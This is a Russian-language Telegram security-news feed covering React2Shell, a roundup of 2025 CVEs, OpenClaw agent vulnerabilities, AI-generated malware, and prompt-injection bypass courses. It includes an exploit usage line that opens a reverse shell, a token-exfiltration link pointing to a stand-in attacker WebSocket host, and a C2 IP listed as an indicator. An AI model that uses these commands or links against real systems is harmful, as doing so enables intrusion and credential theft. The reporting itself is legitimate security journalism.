Cult Of Wire
936 subscribers
206 photos
2 videos
37 files
1.13K links
Мир проигравшего киберпанка.

Для связи: @the29a
Download Telegram
Небольшое продолжение по CVE-2025-55182

CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит.

Получить шелл можно в одну команду:
# Предварительно не забываем поднять листенер, скрипт его не поднимает.
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234

# Или сразу прогнать список
python3 exp.py -f targets.txt --check

Подоспел и плагин для Burp: Next.js RSC RCE Scanner.

По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результаты скромнее, но тоже неплохо), а Amazon уже сообщает, что китайские хакеры уже вовсю эксплуатируют уязвимость.

Разбор самой уязвимости можно почитать в блоге SeachLight Cyber и в PoC-разборе от maple3142.

А у Project Disovery появился обновлённый шаблон для Nuclei.

—-

- Gihub Gist: POC for CVE-2025-55182 that works on Next.js 16.0.6
- SeachLight Cyber High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
- AWS Security Blog: China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
👎1
Если в AI\ML есть Red Team, то для него должен быть Red Team Field Manual.

А если серьезно, то тема довольно интересная, а тут всё и сразу в одном месте.

Сам Field Manual, инструменты и скрипты так же доступны на Github:
github.com/Shiva108/ai-llm-red-team-handbook
2👎1
Год заканчивается, время подводить итоги, показывать какие-нибудь циферки и поделиться своими выводами и видением.
Попробую и я сойти за умного и поделиться своими заметками.

Топ 5 CVE (плюс бонус):
1. React2Shell (CVE-2025-55182) - мой личный топ года. Красиво, эпично и масштабно. 10/10.
2. Windows NTLM V1 Elevation of Privilege Vulnerability (CVE-2025-21311) - мне редко интересны уязвимости в Windows (правда там и на samba импакт), но тут прямо здорово. NTLM V1 в 2025 году? Что может пойти не так?
3. Microsoft WSUS Deserialization RCE (CVE-2025-59287) - снова уязвимость в Windows, но зато какая. А если учесть, что были найдены хосты WSUS, доступные из дикого интернета, то совсем красота получается.
4. Apache Tomcat Path Traversal (CVE-2025-55752) - немного набивший оскомину Tomcat, который каждый год должен быть в таких топах.
5. n8n Remote Code Execution (CVE-2025-68613) - AI-автоматизация врывается в тренды, в том числе и с CVE.

Бонус:
MongoDB Unauthenticated Memory Leak Exploit (MongoBleed) (CVE-2025-14847) - запоздалый "подарок" под конец года. Бага в zlib позволяет злоумышленникам инициировать утечку информации.

Список можно продолжать ещё долго, но остановимся на этом.

Количество CVE от года к году продолжает расти. Если 2024 закончился на ≈ 40 тысячах (40303 по данным CVEDdetails, 39972 по данным NVD), то 2025 заканчивается на 47к+, что показывает примерный прирост ~40% (в среднем 135 новых CVE в день).

По критичности выходит примерно следующее (данные везде разные, возьму за основу CVEFeed.io):
Всего: 49170 CVE
Critical (9.0–10.0): ≈ 13.6 % (6672 уязвимости)
High (7.0–8.9): ≈ 34.1 % (16721 уязвимость)
Medium (4.0–6.9): ≈ 43.8 % (около 21,236 уязвимостей)
Low (0.1–3.9) + N/A ≈ 1.8 % (897 меньшая часть, плюс некоторые без оценки)
N/A: 3 164 ≈ 6.5 %

Данные разнятся, но ± количество и соотношение такое (CVE.ICU показывает схожие цифры, да и пока эти цифры указываешь, информация уже теряет актуальность).

C Weaknesses всё довольно ожидаемо и CWE Top 5 выглядит так:
- XSS (CWE-79)
- SQLi (CWE-89)
- CSRF (CWE-352)
- Missing Authorization (CWE-862)
- Out-of-bounds Write (CWE-787)

Тренды:
- Нейронки: не только в атаке, но и в обороне. Как минимум, детекты дипфейков и прочего AI-generated контента уже более частое явление.
- Supply chain: со временем лучше не становится, и даже в OWASP Top 10 2025 Software Supply Chain Failures находится на 3 месте.
- Nation-state hackers: не особо какая новость, но активность Nation-state хакеров становится делом привычным, и на спад их активность не идёт.
- Инфостилеры никуда не делись: за 2025 утекли данные как минимум 16 компаний\организаций, а модель Malware-as-a-Service превратила стилеры в процветающий "теневой" бизнес.

Хактивисты измельчали, нейронки активно применяются в фишинге и написании зловредов, а в воздухе повис дух quantum threats to cryptography. А ещё падения Cloudflare и AWS.

Сложно сказать, что нам готовит год грядущий, но каждый раз что-то интересное и неожиданное.
Продолжаем вести наблюдение.
1
Очередной год подходит к завершению, и можно отложить дела и планы в сторону и перейти к салатам и поздравлениям.

Про то, что год был тяжелый все говорят каждый раз, так что не буду это повторять.

В наступающем году желаю достигать своих целей, открывать новые горизонты, строить и ломать (каждый год об этом говорю), но и про отдых не забываем.

Всё будет, как мы любим.
До встречи в 2026.

И по традиции, музыка:
1🔥1🤩1
Про Clawdbot вещают из каждого утюга. Self-hosted-революция, сотни или даже тысячи скупленных Mac Mini. Штука действительно интересная и даже захотелось себе такое развернуть. Но сейчас не об этом.

Из минорных новостей: Clawdbot успел аж 2 раза поменять имя и нынче он OpenClaw. Новость не примечательная, и скорей для общей информации.

Теперь немного интересного:
Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site - из-за мисконфига в сервисе Moltbook утекли данные 1.49 миллионов учётных записей. Moltbook это социальная сеть для агентов, и если верить основателю, то и написана она так же OpenClaw.

1-Click RCE To Steal Your Moltbot Data and Keys - цепочка их двух ошибок:
1. Отсутствие проверки Origin в WebSocket;
2. Утечка токена авторизации.

Уязвимость уже имеет CVE - CVE-2026-25253.

Hacking Clawdbot and Eating Lobster Souls - статья от Джеймисона О'Рейли (Jamieson O’Reilly) с разбором уязвимостей в архитектуре OpenClaw. Тут получился целый набор: агенты доступные из интернета, Prompt Injection, уязвимости в цепочках поставок данных, манипуляция логикой.

Ну и дежурное напоминание от Infostealers про дополнительные угрозы инфостилеров - ClawdBot: The New Primary Target for Infostealers in the AI Era.

В общем, разработка и деплой на вайбе приводит к занятным и не очень приятным результатам.
👍4😁1
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun

Нейрослоп теперь банановый зловредный. Check Point Research считает, что мы вошли в эру киберкрайм-сингуялрности и аноны могут создавать зловреды с помощью нейронок.

Речь идёт про VoidLink, и это не просто какая-то обычная малварь, а целый модульный фреймворк, с системой плагинов и защитой (runtime code encryption, self-deletion upon tampering). Разработчики не известны, но на всякий случай виноват Китай, а сам фреймворк активно развивается и есть предположение, что он предназначен для коммерческого использования.

Можно сказать, что это официально первый фреймворк, написанный с использованием нейронок, и не скрипт-кидди, а опытным одиночкой или командой.

Пока не ясно, как будут развиваться события, но начало уже увлекательное.
Раз уж начали неделю c AI, то продолжим небольшим курсом от Aiteera.

Сам курс небольшой и состоит из 9 уроков, и скорей рассчитан на начинающих:
- Introduction
- Basic Defense Bypass
- Advanced Techniques
- Obfuscation Attacks
- Leetspeak Attacks
- Text Reversal Techniques
- Base64 & Encoding Bypasses
- Emoji Obfuscation
- Cipher & Substitution Patterns

А для тех, кто уже преисполнился, может опробовать свои силы в Antijection Challenge.
Forwarded from PurpleBear (Vadim Shelest)
One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)

Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.

🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)

⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего

💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте

📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control

Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет
ClawdBot Skills Just Ganked Your Crypto

Немного прослоупочил и пропустил важную веху в эре программного обеспечения для нейронок (или связанного с ними). Теперь это полноценный софт. По крайней мере со своими зловредами в своих "репозиториях".

Кратко:
- 386 вредоносных навыков маскируются под инструменты автоматизации торговли криптой.
- Зловредные навыки, опубликованные пользователем hightower6eu, скачали почти 7000 раз.
- Все вредоносные навыки используют один и тот же С2 (91[.]92[.]242[.]30).

Схема проста: фейковый алерт -> "обязательный AuthTool" -> one-liner или ZIP-архив с exe-файлом.

Цели тривиальны: API‑ключи бирж, приватные ключи (MetaMask), пароли браузеров, ключи SSH, токены AWS/GCP.

Разбираться с этим никто не будет, сам Питер советует делать хорошо, а плохо не делать. Но появилось партнёрство с Virustotal, которое вряд ли радикально изменит ситуацию.

Ссылки и IOC есть в статье.

Нейронки, которые воруют крипту. Если ClawdBot так хорош, то почему он не может сканировать навыки?
Это точно тот киберпанк, который мы заслужили.
Это настолько плохо, что даже хорошо.
Хорошей пятницы.
1
Forwarded from Mikrotik Ninja
https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise

Trivy в GitHub Action взломали.

Если вы использовали Trivy от 0.18.0 до 0.35.0 - мои поздравления - смена паролей в пятницу вечером вам обеспечена